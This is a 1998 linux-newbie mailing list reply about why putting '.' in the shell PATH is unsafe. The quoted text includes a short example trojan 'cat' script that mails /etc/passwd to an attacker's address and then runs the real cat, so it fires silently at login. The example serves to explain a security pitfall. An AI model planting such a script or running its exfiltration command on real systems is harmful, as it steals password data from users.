On Sun, 30 Aug 1998, Mike wrote:
> Date: Sun, 30 Aug 1998 16:04:59 +0100 (GMT)
> From: Mike <[EMAIL PROTECTED]>
> Reply-To: Mike Ricketts <[EMAIL PROTECTED]>
> To: Gevaerts Frank <[EMAIL PROTECTED]>
> Cc: Kenneth Stephen <[EMAIL PROTECTED]>,
linux-newbie <[EMAIL PROTECTED]>
> Subject: Re: Correctness of the newbie FAQ
>
> On Sat, 29 Aug 1998, Gevaerts Frank wrote:
>
> > If you don't have '.' in your path, you can't execute programs in the
> > current directory, unless you type in a full pathname. If you have it in
> > your path, and some malicious user makes a nasty script and calls it ls,
> > if you try to do 'ls' in his homedirectory, you will in fact execute his
> > script.
> > You can avoid this by placing '.' last in your path, but as the FAQ points
> > out, our evil user could then make a script 'sl', hoping you would make a
> > typo in his homedirectory.
> > If you don't have '.' in your path at all, but only /bin, /usr/bin ...,
> > you can only execute binaries in those directories, in which normal usres
> > can't (or shouldn't be able to) change anything
> >
> There is an even more serious possibility if a user has '.' at the start
> of their path. Consider a user with . in their path, who as a login
> script something like:
> # .bash_profile
>
> # Get the aliases and functions
> if [ -f ~/.bashrc ]; then
> . ~/.bashrc
> fi
>
> # User specific environment and startup programs
>
> PATH=.:$PATH:$HOME/bin
> ENV=$HOME/.bashrc
> USERNAME=""
>
> export USERNAME ENV PATH
>
> cat ~/todo
>
> Now a hacker creates a script in that user's home directory, called cat,
> that does
> #!/bin/bash
> /bin/cat /etc/passwd | mail [EMAIL PROTECTED]
> /bin/cat $*
>
> Now the next time your user logs in, your password file gets mailed and
> the hacker can carry out a dictionary attack. Not good.
Aren't we being a bit too paranoid ?
First, if he gets access to your account, even ftp only, he might just
download the /etc/passwd file right away. And second, most systems use
shadow, so /etc/passwd is useless for a cracker.
Karel
Karel Bemelmans, Narfum Inc.
[-- Contact --] --> [EMAIL PROTECTED]
[-- Website --] --> http://www.narfum.org
